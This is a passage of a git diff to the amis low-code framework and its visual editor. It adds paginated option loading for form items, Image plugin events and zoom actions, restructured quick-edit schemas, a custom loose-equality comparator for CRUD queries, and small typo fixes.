=== 'string' + ? __(filter(messages.validateFailed, store.data)) + : undefined + ); + + dispatchEvent(result ? 'validateSucc' : 'validateError', data); + return result; } setErrors(errors: {[propName: string]: string}, tag = 'remote') { diff --git a/packages/amis-core/src/renderers/Options.tsx b/packages/amis-core/src/renderers/Options.tsx index 8746525a0..c037608eb 100644 --- a/packages/amis-core/src/renderers/Options.tsx +++ b/packages/amis-core/src/renderers/Options.tsx @@ -37,6 +37,7 @@ import { FormBaseControl } from './Item'; import {IFormItemStore} from '../store/formItem'; +import {isObject} from 'amis-core'; export type OptionsControlComponent = React.ComponentType<FormControlProps>; @@ -230,7 +231,11 @@ export interface OptionsControlProps selectedOptions: Array<Option>; setOptions: (value: Array<any>, skipNormalize?: boolean) => void; setLoading: (value: boolean) => void; - reloadOptions: (setError?: boolean) => void; + reloadOptions: ( + setError?: boolean, + isInit?: boolean, + data?: Record<string, any> + ) => void; deferLoad: (option: Option) => void; leftDeferLoad: (option: Option, leftOptions: Option) => void; expandTreeOptions: (nodePathArr: any[]) => void; @@ -443,15 +448,12 @@ export function registerOptionsControl(config: OptionsConfig) { ); if (prevOptions !== options) { - formItem.setOptions( - normalizeOptions( - options || [], - undefined, - props.valueField || 'value' - ), - this.changeOptionValue, - props.data + formItem.loadOptionsFromDataScope( + props.source as string, + props.data, + this.changeOptionValue ); + this.normalizeValue(); } } else if ( @@ -792,20 +794,16 @@ export function registerOptionsControl(config: OptionsConfig) { } @autobind - reloadOptions(setError?: boolean, isInit = false) { - const {source, formItem, data, onChange, setPrinstineValue, valueField} = + reloadOptions(setError?: boolean, isInit = false, data = this.props.data) { + const {source, formItem, onChange, setPrinstineValue, valueField} = this.props; if (formItem && isPureVariable(source as string)) { isAlive(formItem) && - formItem.setOptions( - normalizeOptions( - resolveVariableAndFilter(source as string, data, '| raw') || [], - undefined, - valueField - ), - this.changeOptionValue, - data + formItem.loadOptionsFromDataScope( + source as string, + data, + this.changeOptionValue ); return; } else if (!formItem || !isEffectiveApi(source, data)) { diff --git a/packages/amis-core/src/renderers/wrapControl.tsx b/packages/amis-core/src/renderers/wrapControl.tsx index e8eda268b..7a6d21249 100644 --- a/packages/amis-core/src/renderers/wrapControl.tsx +++ b/packages/amis-core/src/renderers/wrapControl.tsx @@ -156,7 +156,8 @@ export function wrapControl< minLength, maxLength, validateOnChange, - label + label, + pagination } } = this.props; @@ -230,7 +231,8 @@ export function wrapControl< validateOnChange, label, inputGroupControl, - extraName + extraName, + pagination }); // issue 这个逻辑应该在 combo 里面自己实现。 @@ -380,7 +382,8 @@ export function wrapControl< 'minLength', 'maxLength', 'label', - 'extraName' + 'extraName', + 'pagination' ], prevProps.$schema, props.$schema, diff --git a/packages/amis-core/src/store/combo.ts b/packages/amis-core/src/store/combo.ts index 1b10e7347..67a781966 100644 --- a/packages/amis-core/src/store/combo.ts +++ b/packages/amis-core/src/store/combo.ts @@ -35,7 +35,8 @@ export const ComboStore = iRendererStore minLength: 0, maxLength: 0, length: 0, - activeKey: 0 + activeKey: 0, + memberValidMap: types.optional(types.frozen(), {}) }) .views(self => { function getForms() { @@ -170,13 +171,21 @@ export const ComboStore = iRendererStore self.activeKey = key; } + function setMemberValid(valid: boolean, index: number) { + self.memberValidMap = { + ...self.memberValidMap, + [index]: valid + }; + } + return { config, setActiveKey, bindUniuqueItem, unBindUniuqueItem, addForm, - onChildStoreDispose + onChildStoreDispose, + setMemberValid }; }); diff --git a/packages/amis-core/src/store/crud.ts b/packages/amis-core/src/store/crud.ts index f89d4dcb0..d213b5f28 100644 --- a/packages/amis-core/src/store/crud.ts +++ b/packages/amis-core/src/store/crud.ts @@ -141,7 +141,32 @@ export const CRUDStore = ServiceStore.named('CRUDStore') ...values }; - if (isObjectShallowModified(originQuery, query, false)) { + /** + * 非严格模式下也需要严格比较的CASE + * @reference https://tc39.es/ecma262/#sec-islooselyequal + */ + const exceptedLooselyRules: [any, any][] = [ + [0, ''], + [false, ''], + [false, '0'], + [false, 0], + [true, 1], + [true, '1'] + ]; + + if ( + isObjectShallowModified(originQuery, query, (lhs: any, rhs: any) => { + if ( + exceptedLooselyRules.some( + rule => rule.includes(lhs) && rule.includes(rhs) + ) + ) { + return lhs !== rhs; + } + + return lhs != rhs; + }) + ) { if (query[pageField || 'page']) { self.page = parseInt(query[pageField || 'page'], 10); } diff --git a/packages/amis-core/src/store/formItem.ts b/packages/amis-core/src/store/formItem.ts index d5a29c7f6..7c1141fd6 100644 --- a/packages/amis-core/src/store/formItem.ts +++ b/packages/amis-core/src/store/formItem.ts @@ -7,11 +7,13 @@ import { Instance } from 'mobx-state-tree'; import isEqualWith from 'lodash/isEqualWith'; +import uniqWith from 'lodash/uniqWith'; import {FormStore, IFormStore} from './form'; import {str2rules, validate as doValidate} from '../utils/validations'; import {Api, Payload, fetchOptions, ApiObject} from '../types'; import {ComboStore, IComboStore, IUniqueGroup} from './combo'; import {evalExpression} from '../utils/tpl'; +import {resolveVariableAndFilter} from '../utils/tpl-builtin'; import {buildApi, isEffectiveApi} from '../utils/api'; import findIndex from 'lodash/findIndex'; import { @@ -98,6 +100,7 @@ export const FormItemStore = StoreNode.named('FormItemStore') joinValues: true, extractValue: false, options: types.optional(types.frozen<Array<any>>(), []), + optionsRaw: types.optional(types.frozen<Array<any>>(), []), expressionsInOptions: false, selectFirst: false, autoFill: types.frozen(), @@ -113,7 +116,18 @@ export const FormItemStore = StoreNode.named('FormItemStore') /** 当前表单项所属的InputGroup父元素, 用于收集InputGroup的子元素 */ inputGroupControl: types.optional(types.frozen(), {}), colIndex: types.frozen(), - rowIndex: types.frozen() + rowIndex: types.frozen(), + /** Transfer组件分页模式 */ + pagination: types.optional(types.frozen(), { + enable: false, + /** 当前页数 */ + page: 1, + /** 每页显示条数 */ + perPage: 10, + /** 总条数 */ + total: 0 + }), + accumulatedOptions: types.optional(types.frozen<Array<any>>(), []) }) .views(self => { function getForm(): any { @@ -175,6 +189,26 @@ export const FormItemStore = StoreNode.named('FormItemStore') return getLastOptionValue(); }, + /** 数据源接口数据是否开启分页 */ + get enableSourcePagination(): boolean { + return !!self.pagination.enable; + }, + + /** 数据源接口开启分页时当前页码 */ + get sourcePageNum(): number { + return self.pagination.page ?? 1; + }, + + /** 数据源接口开启分页时每页显示条数 */ + get sourcePerPageNum(): number { + return self.pagination.perPage ?? 10; + }, + + /** 数据源接口开启分页时数据总条数 */ + get sourceTotalNum(): number { + return self.pagination.total ?? 0; + }, + getSelectedOptions: ( value: any = self.tmpValue, nodeValueArray?: any[] | undefined @@ -308,7 +342,8 @@ export const FormItemStore = StoreNode.named('FormItemStore') minLength, validateOnChange, label, - inputGroupControl + inputGroupControl, + pagination }: { extraName?: string; required?: boolean; @@ -338,6 +373,11 @@ export const FormItemStore = StoreNode.named('FormItemStore') path: string; [propsName: string]: any; }; + pagination?: { + enable?: boolean; + page?: number; + perPage?: number; + }; }) { if (typeof rules === 'string') { rules = str2rules(rules); @@ -372,6 +412,15 @@ export const FormItemStore = StoreNode.named('FormItemStore') inputGroupControl?.name != null && (self.inputGroupControl = inputGroupControl); + if (pagination && isObject(pagination) && !!pagination.enable) { + self.pagination = { + enable: true, + page: pagination.page ? pagination.page || 1 : 1, + perPage: pagination.perPage ? pagination.perPage || 10 : 10, + total: 0 + }; + } + if ( typeof rules !== 'undefined' || typeof required !== 'undefined' || @@ -556,6 +605,23 @@ export const FormItemStore = StoreNode.named('FormItemStore') } } + function setPagination(params: { + page?: number; + perPage?: number; + total?: number; + }) { + const {page, perPage, total} = params || {}; + + if (self.enableSourcePagination) { + self.pagination = { + ...self.pagination, + ...(page != null && typeof page === 'number' ? {page} : {}), + ...(perPage != null && typeof perPage === 'number' ? {perPage} : {}), + ...(total != null && typeof total === 'number' ? {total} : {}) + }; + } + } + function setOptions( options: Array<object>, onChange?: (value: any) => void, @@ -567,6 +633,15 @@ export const FormItemStore = StoreNode.named('FormItemStore') options = filterTree(options, item => item); const originOptions = self.options.concat(); self.options = options; + /** 开启分页后当前选项内容需要累加 */ + self.accumulatedOptions = self.enableSourcePagination + ? uniqWith( + [...originOptions, ...options], + (lhs, rhs) => + lhs[self.valueField ?? 'value'] === + rhs[self.valueField ?? 'value'] + ) + : options; syncOptions(originOptions, data); let selectedOptions; @@ -722,6 +797,14 @@ export const FormItemStore = StoreNode.named('FormItemStore') options = normalizeOptions(options as any, undefined, self.valueField); + if (self.enableSourcePagination) { + self.pagination = { + ...self.pagination, + page: parseInt(json.data?.page, 10) || 1, + total: parseInt(json.data?.total ?? json.data?.count, 10) || 0 + }; + } + if (config?.extendsOptions && self.selectedOptions.length > 0) { self.selectedOptions.forEach((item: any) => { const exited = findTree( @@ -752,6 +835,41 @@ export const FormItemStore = StoreNode.named('FormItemStore') return json; }); + /** + * 从数据域加载选项数据源,注意这里默认source变量解析后是全量的数据源 + */ + function loadOptionsFromDataScope( + source: string, + ctx: Record<string, any>, + onChange?: (value: any) => void + ) { + let options: any[] = resolveVariableAndFilter(source, ctx, '| raw'); + + if (!Array.isArray(options)) { + return []; + } + + options = normalizeOptions(options, undefined, self.valueField); + + if (self.enableSourcePagination) { + self.pagination = { + ...self.pagination, + ...(ctx?.page ? {page: ctx?.page} : {}), + ...(ctx?.perPage ? {perPage: ctx?.perPage} : {}), + total: options.length + }; + } + + options = options.slice( + (self.pagination.page - 1) * self.pagination.perPage, + self.pagination.page * self.pagination.perPage + ); + + setOptions(options, onChange, ctx); + + return options; + } + const loadAutoUpdateData: ( api: Api, data?: object, @@ -1377,8 +1495,10 @@ export const FormItemStore = StoreNode.named('FormItemStore') setError, addError, clearError, + setPagination, setOptions, loadOptions, + loadOptionsFromDataScope, deferLoadOptions, deferLoadLeftOptions, expandTreeOptions, diff --git a/packages/amis-core/src/utils/helper.ts b/packages/amis-core/src/utils/helper.ts index a91b06203..c399e9155 100644 --- a/packages/amis-core/src/utils/helper.ts +++ b/packages/amis-core/src/utils/helper.ts @@ -251,7 +251,7 @@ export function rmUndefined(obj: PlainObject) { export function isObjectShallowModified( prev: any, next: any, - strictMode: boolean = true, + strictModeOrFunc: boolean | ((lhs: any, rhs: any) => boolean) = true, ignoreUndefined: boolean = false, statck: Array<any> = [] ): boolean { @@ -262,7 +262,7 @@ export function isObjectShallowModified( isObjectShallowModified( prev, next[index], - strictMode, + strictModeOrFunc, ignoreUndefined, statck ) @@ -281,7 +281,11 @@ export function isObjectShallowModified( isObservable(prev) || isObservable(next) ) { - return strictMode ? prev !== next : prev != next; + if (strictModeOrFunc && typeof strictModeOrFunc === 'function') { + return strictModeOrFunc(prev, next); + } + + return strictModeOrFunc ? prev !== next : prev != next; } if (ignoreUndefined) { @@ -311,7 +315,7 @@ export function isObjectShallowModified( isObjectShallowModified( prev[key], next[key], - strictMode, + strictModeOrFunc, ignoreUndefined, statck ) diff --git a/packages/amis-core/src/utils/style-helper.ts b/packages/amis-core/src/utils/style-helper.ts index ff213dc4b..0a88a6929 100644 --- a/packages/amis-core/src/utils/style-helper.ts +++ b/packages/amis-core/src/utils/style-helper.ts @@ -163,7 +163,11 @@ export function formatStyle( const styles: string[] = []; const fn = (key: string, value: string) => { key = valueMap[key] || key; - styles.push(`${kebabCase(key)}: ${value};`); + styles.push( + `${kebabCase(key)}: ${ + value + (weights?.important ? ' !important' : '') + };` + ); }; Object.keys(statusMap[status]).forEach(key => { if (key !== '$$id') { @@ -191,15 +195,11 @@ export function formatStyle( } else { const value = style; if (key === 'iconSize') { - fn('width', value + (weights?.important ? ' !important' : '')); - fn('height', value + (weights?.important ? ' !important' : '')); - fn( - 'font-size', - value + (weights?.important ? ' !important' : '') - ); + fn('width', value); + fn('height', value); + fn('font-size', value); } else { - value && - fn(key, value + (weights?.important ? ' !important' : '')); + value && fn(key, value); } } } diff --git a/packages/amis-editor-core/src/plugin.ts b/packages/amis-editor-core/src/plugin.ts index 30174d640..f690c34eb 100644 --- a/packages/amis-editor-core/src/plugin.ts +++ b/packages/amis-editor-core/src/plugin.ts @@ -304,7 +304,9 @@ export interface RendererInfo extends RendererScaffoldInfo { sharedContext?: Record<string, any>; dialogTitle?: string; //弹窗标题用于弹窗大纲的展示 dialogType?: string; //区分确认对话框类型 - subEditorVariable?: Array<{label: string; children: any}>; // 传递给子编辑器的组件自定义变量,如listSelect的选项名称和值 + getSubEditorVariable?: ( + schema?: any + ) => Array<{label: string; children: any}>; // 传递给子编辑器的组件自定义变量,如listSelect的选项名称和值 } export type BasicRendererInfo = Omit< @@ -1051,7 +1053,7 @@ export abstract class BasePlugin implements PluginInterface { isListComponent: plugin.isListComponent, rendererName: plugin.rendererName, memberImmutable: plugin.memberImmutable, - subEditorVariable: plugin.subEditorVariable + getSubEditorVariable: plugin.getSubEditorVariable }; } } diff --git a/packages/amis-editor-core/src/util.ts b/packages/amis-editor-core/src/util.ts index ba099172a..cceedf751 100644 --- a/packages/amis-editor-core/src/util.ts +++ b/packages/amis-editor-core/src/util.ts @@ -1224,7 +1224,10 @@ export async function resolveVariablesFromScope(node: any, manager: any) { // 子编辑器内读取的host节点自定义变量,非数据域方式,如listSelect的选项值 let hostNodeVaraibles = []; if (manager?.store?.isSubEditor) { - hostNodeVaraibles = manager.config?.hostNode?.info?.subEditorVariable || []; + hostNodeVaraibles = + manager.config?.hostNode?.info?.getSubEditorVariable?.( + manager.config?.hostNode.schema + ) || []; } const variables: VariableItem[] = diff --git a/packages/amis-editor/src/plugin/CRUD.tsx b/packages/amis-editor/src/plugin/CRUD.tsx index ed962e0fb..692f28085 100644 --- a/packages/amis-editor/src/plugin/CRUD.tsx +++ b/packages/amis-editor/src/plugin/CRUD.tsx @@ -578,7 +578,7 @@ export class CRUDPlugin extends BasePlugin { name: 'filterColumnCount' } ], - visibleOn: 'data.features && data.features.includes("filter")' + visibleOn: "${features && features.includes('filter')}" }, { name: 'columns', diff --git a/packages/amis-editor/src/plugin/Calendar.tsx b/packages/amis-editor/src/plugin/Calendar.tsx index 7f854725c..d4695e697 100644 --- a/packages/amis-editor/src/plugin/Calendar.tsx +++ b/packages/amis-editor/src/plugin/Calendar.tsx @@ -20,7 +20,7 @@ export class CalendarPlugin extends BasePlugin { panelTitle = '日历日程'; description = '展示日历及日程。'; - docLink = '/amis/zh-CN/components/calendor'; + docLink = '/amis/zh-CN/components/calendar'; tags = ['展示']; scaffold = { diff --git a/packages/amis-editor/src/plugin/Form/Form.tsx b/packages/amis-editor/src/plugin/Form/Form.tsx index ddf531ec2..6da992f07 100644 --- a/packages/amis-editor/src/plugin/Form/Form.tsx +++ b/packages/amis-editor/src/plugin/Form/Form.tsx @@ -474,7 +474,7 @@ export class FormPlugin extends BasePlugin { return { type: 'container', className: 'form-item-gap', - visibleOn: `data.feat === '${feat.value}' && (!data.dsType || data.dsType === '${builderKey}')`, + visibleOn: `$\{feat === '${feat.value}' && (!dsType || dsType === '${builderKey}')}`, body: flatten([ builder.makeSourceSettingForm({ feat: feat.value, @@ -685,26 +685,28 @@ export class FormPlugin extends BasePlugin { const dsSettings = flatten( this.Features.map(feat => this.dsManager.buildCollectionFromBuilders( - (builder, builderKey, index) => ({ - type: 'container', - className: 'form-item-gap', - visibleOn: `data.feat === '${ - feat.value - }' && (data.dsType == null ? '${builderKey}' === '${ - defaultDsType || ApiDSBuilderKey - }' : data.dsType === '${builderKey}')`, - body: flatten([ - builder.makeSourceSettingForm({ - feat: feat.value, - renderer: 'form', - inScaffold: false, - sourceSettings: { - renderLabel: true, - userOrders: false - } - }) - ]) - }) + (builder, builderKey, index) => { + return { + type: 'container', + className: 'form-item-gap', + visibleOn: `$\{feat === '${ + feat.value + }' && (dsType == null ? '${builderKey}' === '${ + defaultDsType || ApiDSBuilderKey + }' : dsType === '${builderKey}')}`, + body: flatten([ + builder.makeSourceSettingForm({ + feat: feat.value, + renderer: 'form', + inScaffold: false, + sourceSettings: { + renderLabel: true, + userOrders: false + } + }) + ]) + }; + } ) ) ); diff --git a/packages/amis-editor/src/plugin/Form/InputTable.tsx b/packages/amis-editor/src/plugin/Form/InputTable.tsx index 5449bf410..4315718b8 100644 --- a/packages/amis-editor/src/plugin/Form/InputTable.tsx +++ b/packages/amis-editor/src/plugin/Form/InputTable.tsx @@ -1071,6 +1071,16 @@ export class TableControlPlugin extends BasePlugin { name: 'affixHeader', label: '是否固定表头', pipeIn: defaultValue(false) + }), + getSchemaTpl('switch', { + name: 'showFooterAddBtn', + label: '展示底部新增按钮', + pipeIn: defaultValue(true) + }), + getSchemaTpl('switch', { + name: 'showTableAddBtn', + label: '展示操作列新增按钮', + pipeIn: defaultValue(true) }) ] }, @@ -1080,6 +1090,10 @@ export class TableControlPlugin extends BasePlugin { getSchemaTpl('className', { name: 'rowClassName', label: '行样式' + }), + getSchemaTpl('className', { + name: 'toolbarClassName', + label: '工具栏' }) ] }) diff --git a/packages/amis-editor/src/plugin/Form/ListSelect.tsx b/packages/amis-editor/src/plugin/Form/ListSelect.tsx index c6574400a..e97724ca8 100644 --- a/packages/amis-editor/src/plugin/Form/ListSelect.tsx +++ b/packages/amis-editor/src/plugin/Form/ListSelect.tsx @@ -109,21 +109,26 @@ export class ListControlPlugin extends BasePlugin { } ]; - subEditorVariable: Array<{label: string; children: any}> = [ - { - label: '当前选项', - children: [ - { - label: '选项名称', - value: 'label' - }, - { - label: '选项值', - value: 'value' - } - ] - } - ]; + getSubEditorVariable(schema: any): Array<{label: string; children: any}> { + let labelField = schema?.labelField || 'label'; + let valueField = schema?.valueField || 'value'; + + return [ + { + label: '当前选项', + children: [ + { + label: '选项名称', + value: labelField + }, + { + label: '选项值', + value: valueField + } + ] + } + ]; + } panelBodyCreator = (context: BaseEventContext) => { return formItemControl( @@ -201,7 +206,7 @@ export class ListControlPlugin extends BasePlugin { body: [ { type: 'tpl', - tpl: `\${${this.getDisplayField(value)}}`, + tpl: `\${${this.getDisplayField(data)}}`, wrapperComponent: '', inline: true } @@ -275,16 +280,7 @@ export class ListControlPlugin extends BasePlugin { } getDisplayField(data: any) { - if ( - data.source || - (data.map && - Array.isArray(data.map) && - data.map[0] && - Object.keys(data.map[0]).length > 1) - ) { - return data.labelField ?? 'label'; - } - return 'label'; + return data?.labelField ?? 'label'; } editDetail(id: string, field: string) { diff --git a/packages/amis-editor/src/plugin/Form/Picker.tsx b/packages/amis-editor/src/plugin/Form/Picker.tsx index 07165aafb..35a00ed65 100644 --- a/packages/amis-editor/src/plugin/Form/Picker.tsx +++ b/packages/amis-editor/src/plugin/Form/Picker.tsx @@ -50,7 +50,7 @@ export class PickerControlPlugin extends BasePlugin { value: 'B' } ], - modalClassName: 'app-popover' + modalClassName: 'app-popover :AMISCSSWrapper' }; previewSchema: any = { type: 'form', diff --git a/packages/amis-editor/src/plugin/Form/Static.tsx b/packages/amis-editor/src/plugin/Form/Static.tsx index d9acbaed6..57b3cf3a3 100644 --- a/packages/amis-editor/src/plugin/Form/Static.tsx +++ b/packages/amis-editor/src/plugin/Form/Static.tsx @@ -1,4 +1,6 @@ import React from 'react'; +import get from 'lodash/get'; +import {getVariable} from 'amis-core'; import {Button} from 'amis'; import { defaultValue, @@ -22,6 +24,15 @@ setSchemaTpl('quickEdit', (patch: any, manager: any) => ({ hiddenOnDefault: true, formType: 'extend', pipeIn: (value: any) => !!value, + trueValue: { + mode: 'popOver', + type: 'container', + body: [] + }, + isChecked: (e: any) => { + const {data, name} = e; + return !!get(data, name); + }, form: { body: [ { @@ -67,19 +78,34 @@ setSchemaTpl('quickEdit', (patch: any, manager: any) => ({ children: ({value, onChange, data}: any) => { if (value === true) { value = {}; + } else if (typeof value === 'undefined') { + value = getVariable(data, 'quickEdit'); } - - const originMode = value.mode; - - value = { - type: 'input-text', - name: data.name, - ...value - }; - delete value.mode; - + value = {...value}; + const originMode = value.mode || 'popOver'; + if (value.mode) { + delete value.mode; + } + value = + value.body && ['container', 'wrapper'].includes(value.type) + ? { + // schema中存在容器,用自己的就行 + type: 'container', + body: [], + ...value + } + : { + // schema中不存在容器,打开子编辑器时需要包裹一层 + type: 'container', + body: [ + { + type: 'input-text', + name: data.name, + ...value + } + ] + }; // todo 多个快速编辑表单模式看来只能代码模式编辑了。 - return ( <Button block @@ -88,12 +114,6 @@ setSchemaTpl('quickEdit', (patch: any, manager: any) => ({ manager.openSubEditor({ title: '配置快速编辑类型', value: value, - slot: { - type: 'form', - mode: 'normal', - body: ['$$'], - wrapWithPanel: false - }, onChange: (value: any) => onChange( { diff --git a/packages/amis-editor/src/plugin/Image.tsx b/packages/amis-editor/src/plugin/Image.tsx index 7daef8a26..2815754e5 100644 --- a/packages/amis-editor/src/plugin/Image.tsx +++ b/packages/amis-editor/src/plugin/Image.tsx @@ -1,4 +1,9 @@ -import {getI18nEnabled, registerEditorPlugin} from 'amis-editor-core'; +import { + RendererPluginAction, + RendererPluginEvent, + getI18nEnabled, + registerEditorPlugin +} from 'amis-editor-core'; import { ActiveEventContext, BaseEventContext, @@ -8,6 +13,10 @@ import { } from 'amis-editor-core'; import {defaultValue, getSchemaTpl, tipedLabel} from 'amis-editor-core'; import {mockValue} from 'amis-editor-core'; +import { + getArgsWrapper, + getEventControlConfig +} from '../renderer/event-control/helper'; export class ImagePlugin extends BasePlugin { static id = 'ImagePlugin'; @@ -34,6 +43,112 @@ export class ImagePlugin extends BasePlugin { value: mockValue({type: 'image'}) }; + // 事件定义 + events: RendererPluginEvent[] = [ + { + eventName: 'click', + eventLabel: '点击', + description: '点击时触发', + defaultShow: true, + dataSchema: [ + { + type: 'object', + properties: { + context: { + type: 'object', + title: '上下文', + properties: { + nativeEvent: { + type: 'object', + title: '鼠标事件对象' + } + } + } + } + } + ] + }, + { + eventName: 'mouseenter', + eventLabel: '鼠标移入', + description: '鼠标移入时触发', + dataSchema: [ + { + type: 'object', + properties: { + context: { + type: 'object', + title: '上下文', + properties: { + nativeEvent: { + type: 'object', + title: '鼠标事件对象' + } + } + } + } + } + ] + }, + { + eventName: 'mouseleave', + eventLabel: '鼠标移出', + description: '鼠标移出时触发', + dataSchema: [ + { + type: 'object', + properties: { + context: { + type: 'object', + title: '上下文', + properties: { + nativeEvent: { + type: 'object', + title: '鼠标事件对象' + } + } + } + } + } + ] + } + ]; + + // 动作定义 + actions: RendererPluginAction[] = [ + { + actionType: 'preview', + actionLabel: '预览', + description: '预览图片' + }, + { + actionType: 'zoom', + actionLabel: '调整图片比例', + description: '将图片等比例放大或缩小', + schema: { + type: 'container', + body: [ + getArgsWrapper([ + getSchemaTpl('formulaControl', { + name: 'scale', + mode: 'horizontal', + variables: '${variables}', + horizontal: { + leftFixed: 4 // 需要设置下leftFixed,否则这个字段的控件没有与其他字段的控件左对齐 + }, + label: tipedLabel( + '调整比例', + '定义每次放大或缩小图片的百分比大小,正值为放大,负值为缩小,默认50' + ), + value: 50, + size: 'lg' + }) + ]) + ] + } + } + ]; + panelTitle = '图片'; panelJustify = true; panelBodyCreator = (context: BaseEventContext) => { @@ -63,7 +178,7 @@ export class ImagePlugin extends BasePlugin { pipeIn: defaultValue('thumb'), options: [ { - label: '缩率图', + label: '缩略图', value: 'thumb' }, { @@ -130,6 +245,24 @@ export class ImagePlugin extends BasePlugin { getSchemaTpl('imageUrl', { name: 'defaultImage', label: tipedLabel('占位图', '无数据时显示的图片') + }), + getSchemaTpl('formulaControl', { + name: 'maxScale', + mode: 'horizontal', + label: tipedLabel( + '放大极限', + '定义动作调整图片大小的最大百分比,默认200' + ), + value: 200 + }), + getSchemaTpl('formulaControl', { + name: 'minScale', + mode: 'horizontal', + label: tipedLabel( + '缩小极限', + '定义动作调整图片大小的最小百分比,默认50' + ), + value: 50 }) ] }, @@ -245,6 +378,16 @@ export class ImagePlugin extends BasePlugin { }, getSchemaTpl('theme:cssCode') ]) + }, + { + title: '事件', + className: 'p-none', + body: [ + getSchemaTpl('eventControl', { + name: 'onEvent', + ...getEventControlConfig(this.manager, context) + }) + ] } ]); }; diff --git a/packages/amis-editor/src/plugin/Images.tsx b/packages/amis-editor/src/plugin/Images.tsx index 1e0349b91..fc3da2d7f 100644 --- a/packages/amis-editor/src/plugin/Images.tsx +++ b/packages/amis-editor/src/plugin/Images.tsx @@ -20,7 +20,7 @@ export class ImagesPlugin extends BasePlugin { pluginIcon = 'images-plugin'; scaffold = { type: 'images', - imageGallaryClassName: 'app-popover' + imageGallaryClassName: 'app-popover :AMISCSSWrapper' }; previewSchema = { ...this.scaffold, diff --git a/packages/amis-editor/src/plugin/Nav.tsx b/packages/amis-editor/src/plugin/Nav.tsx index 0b68a7582..6157c9c14 100644 --- a/packages/amis-editor/src/plugin/Nav.tsx +++ b/packages/amis-editor/src/plugin/Nav.tsx @@ -29,6 +29,7 @@ export class NavPlugin extends BasePlugin { scaffold = { type: 'nav', stacked: true, + popupClassName: 'app-popover :AMISCSSWrapper', links: [ { label: '页面1', diff --git a/packages/amis-editor/src/plugin/Others/TableCell.tsx b/packages/amis-editor/src/plugin/Others/TableCell.tsx index a69c71b69..7949d8574 100644 --- a/packages/amis-editor/src/plugin/Others/TableCell.tsx +++ b/packages/amis-editor/src/plugin/Others/TableCell.tsx @@ -1,5 +1,6 @@ import {Button} from 'amis'; import React from 'react'; +import get from 'lodash/get'; import {getI18nEnabled, registerEditorPlugin} from 'amis-editor-core'; import { BasePlugin, @@ -69,6 +70,10 @@ export class TableCellPlugin extends BasePlugin { getSchemaTpl('switch', { name: 'quickEdit', label: '启用快速编辑', + isChecked: (e: any) => { + const {data, name} = e; + return !!get(data, name); + }, pipeIn: (value: any) => !!value }), @@ -120,18 +125,32 @@ export class TableCellPlugin extends BasePlugin { } else if (typeof value === 'undefined') { value = getVariable(data, 'quickEdit'); } - - const originMode = value.mode; - - value = { - type: 'input-text', - name: data.name, - ...value - }; - delete value.mode; + value = {...value}; + const originMode = value.mode || 'popOver'; + if (value.mode) { + delete value.mode; + } + value = + value.body && ['container', 'wrapper'].includes(value.type) + ? { + // schema中存在容器,用自己的就行 + type: 'container', + body: [], + ...value + } + : { + // schema中不存在容器,打开子编辑器时需要包裹一层 + type: 'container', + body: [ + { + type: 'input-text', + name: data.name, + ...value + } + ] + }; // todo 多个快速编辑表单模式看来只能代码模式编辑了。 - return ( <Button level="info" @@ -142,12 +161,6 @@ export class TableCellPlugin extends BasePlugin { this.manager.openSubEditor({ title: '配置快速编辑类型', value: value, - slot: { - type: 'form', - mode: 'normal', - body: ['$$'], - wrapWithPanel: false - }, onChange: value => onChange( { diff --git a/packages/amis-editor/src/plugin/SwitchContainer.tsx b/packages/amis-editor/src/plugin/SwitchContainer.tsx index 05dd08adc..1852a11f4 100644 --- a/packages/amis-editor/src/plugin/SwitchContainer.tsx +++ b/packages/amis-editor/src/plugin/SwitchContainer.tsx @@ -321,6 +321,7 @@ export class SwitchContainerPlugin extends LayoutBasePlugin { name: 'items', label: '状态列表', addTip: '新增组件状态', + minLength: 1, items: [ { type: 'input-text', @@ -356,6 +357,10 @@ export class SwitchContainerPlugin extends LayoutBasePlugin { title: '外观', className: 'p-none', body: getSchemaTpl('collapseGroup', [ + getSchemaTpl('theme:base', { + collapsed: false, + extra: [] + }), { title: '布局', body: [ @@ -460,7 +465,15 @@ export class SwitchContainerPlugin extends LayoutBasePlugin { getSchemaTpl('layout:stickyPosition') ] }, - ...getSchemaTpl('theme:common', {exclude: ['layout']}) + { + title: '自定义样式', + body: [ + { + type: 'theme-cssCode', + label: false + } + ] + } ]) }, { diff --git a/packages/amis-editor/src/plugin/TableCell2.tsx b/packages/amis-editor/src/plugin/TableCell2.tsx index 01b643e2f..dc905a1c0 100644 --- a/packages/amis-editor/src/plugin/TableCell2.tsx +++ b/packages/amis-editor/src/plugin/TableCell2.tsx @@ -431,17 +431,14 @@ export class TableCell2Plugin extends BasePlugin { mode: 'normal', formType: 'extend', bulk: true, - defaultData: { - quickEdit: { - mode: 'popOver' - } - }, trueValue: { - mode: 'popOver' + mode: 'popOver', + type: 'container', + body: [] }, isChecked: (e: any) => { const {data, name} = e; - return get(data, name); + return !!get(data, name); }, form: { body: [ @@ -489,27 +486,31 @@ export class TableCell2Plugin extends BasePlugin { } else if (typeof value === 'undefined') { value = getVariable(data, 'quickEdit'); } - - const originMode = value?.mode || 'popOver'; - - value = { - ...value, - type: 'form', - mode: 'normal', - wrapWithPanel: false, - body: value?.body?.length - ? value.body - : [ - { - type: 'input-text', - name: data.key - } - ] - }; - + value = {...value}; + const originMode = value.mode || 'popOver'; if (value.mode) { delete value.mode; } + value = + value.body && ['container', 'wrapper'].includes(value.type) + ? { + // schema中存在容器,用自己的就行 + type: 'container', + body: [], + ...value + } + : { + // schema中不存在容器,打开子编辑器时需要包裹一层 + type: 'container', + body: [ + { + type: 'input-text', + name: data.name, + ...value + } + ] + }; + // todo 多个快速编辑表单模式看来只能代码模式编辑了。 return ( <Button diff --git a/packages/amis-editor/src/renderer/ListItemControl.tsx b/packages/amis-editor/src/renderer/ListItemControl.tsx index 4754bf48c..26117f8bf 100644 --- a/packages/amis-editor/src/renderer/ListItemControl.tsx +++ b/packages/amis-editor/src/renderer/ListItemControl.tsx @@ -7,7 +7,7 @@ import {findDOMNode} from 'react-dom'; import cx from 'classnames'; import get from 'lodash/get'; import Sortable from 'sortablejs'; -import {FormItem, Button, Icon, render as amisRender} from 'amis'; +import {FormItem, Button, Icon, render as amisRender, toast} from 'amis'; import {autobind} from 'amis-editor-core'; import type {Option} from 'amis'; import {createObject, FormControlProps} from 'amis-core'; @@ -30,7 +30,6 @@ export type SourceType = 'custom' | 'api' | 'apicenter' | 'variable'; export interface OptionControlState { items: Array<PlainObject>; - api: SchemaApi; labelField: string; valueField: string; } @@ -50,7 +49,6 @@ export default class ListItemControl extends React.Component< this.state = { items: this.transformOptions(props), - api: props.data.source, 